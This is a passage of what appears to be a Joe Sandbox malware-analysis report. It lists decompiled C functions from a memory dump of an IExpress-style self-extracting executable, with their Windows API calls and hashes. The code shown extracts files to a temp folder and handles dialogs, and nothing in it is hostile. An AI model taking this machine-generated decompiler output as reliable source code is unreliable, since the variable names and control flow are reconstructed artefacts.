                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-1655358546
                                                                                                                                                                                                      • Opcode ID: f0aece4b4ed8d727e5be5a1e8b28bfbad66261fa5b39565b45626d29faaed4fa
                                                                                                                                                                                                      • Instruction ID: 99639795895808fc00c286c6ba577af4e67db6b462750ea0f8048f616bece595
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0aece4b4ed8d727e5be5a1e8b28bfbad66261fa5b39565b45626d29faaed4fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601F930A00198ABD761EB66DC8AFEE737CDB61311F500395F585961C0DFB0AE85CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E003E4169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E003E468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E003E468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E003E44B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003E30B4), ref: 003E4189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003E30B4), ref: 003E41E7
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: bcbfab46e3c2a7cbd1f64b7df9aa21491c9d4115a09871d6b4cd5ca671d10841
                                                                                                                                                                                                      • Instruction ID: 89b816712337410a652e2d4d694ff0e026352d5045988da2be5aa30ed0a0d7f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcbfab46e3c2a7cbd1f64b7df9aa21491c9d4115a09871d6b4cd5ca671d10841
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F01D1B53002B47BFB271A678C86FBB218EDBDC795F014325B705E95C09AB8DC414175
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E7155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0x3e8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0x3e8004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0x3e8008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003E7182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 003E7191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003E719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 003E71A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 003E71B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: fcca34895efc590a2f126a15203552fc7d626c260094b1255e8664b7c013e74d
                                                                                                                                                                                                      • Instruction ID: fccdb995e60cd35e2682861002ab31a95581e17f325b89ac1d1561aaa9cd90ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcca34895efc590a2f126a15203552fc7d626c260094b1255e8664b7c013e74d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72115171D05648EFCB21DFB8DA8869EB7F8FF48311F514A55E405EB290DB309E048B41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E003E43D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0x3e9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 003E1A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E1A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 003E1A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 003E1A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 003E1A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 45767a7d410342790929b150cfe5fb666f8699832f78d3381b35b8935800f814
                                                                                                                                                                                                      • Instruction ID: 6ec4a767b054a3ee3b7ad774a9af41407b28cb22d089a302376446464cedc646
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45767a7d410342790929b150cfe5fb666f8699832f78d3381b35b8935800f814
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11E1315001A9AFCB22EF64DE48ABE77BCEF09300F108364F9129A1D0CA30AE10CB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E003E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E003E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      				E003E658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0x3e9124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E63EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-2356899610
                                                                                                                                                                                                      • Opcode ID: 53ac05ddb711f1ad57522c1f7041f70bd847ed85beffd128f735b461078028d7
                                                                                                                                                                                                      • Instruction ID: 12f71d16ad516155eb9fd923a9925487b9d103bc5993f4c25c2eeb545e040462
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53ac05ddb711f1ad57522c1f7041f70bd847ed85beffd128f735b461078028d7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4221F371A0026CABC722DF26DCC6FEA736CEB54350F000369F584AB2C0CAB06D848F60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E003E1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0x3e91e0; // 0x2c77cb0
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0x3e91e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      					E003E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      				E003E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,003E4E6F), ref: 003E47EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 003E4823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 003E4847
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E4851
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 359063898-2356899610
                                                                                                                                                                                                      • Opcode ID: 05f8cb3ff16b903f4165fcf9d88fc4980da74be929fd593619e9657cbef2a432
                                                                                                                                                                                                      • Instruction ID: faeefeda74631cd55a5e42d187cdd5ff881f625e52187f7964b7d256b9522b0f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05f8cb3ff16b903f4165fcf9d88fc4980da74be929fd593619e9657cbef2a432
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA1106B56046D16FEB278F259C58F763B5EEB89300F058719E9828F3C1DA369C068760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E3680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003E369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 003E36CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: d20d6c340bb21513f9284b7685a717c2aafe4fd287947ab5f6d92815c30b0515
                                                                                                                                                                                                      • Instruction ID: 446976230b3780eb12b2ccbde7098d10c50dfcb85234634078d11989fc5340d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d20d6c340bb21513f9284b7685a717c2aafe4fd287947ab5f6d92815c30b0515
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 930184729002A4B7DB314AA75C8CEEB7B7CEB85B10F010319B905E72C0D5719640C660
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E003E65E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
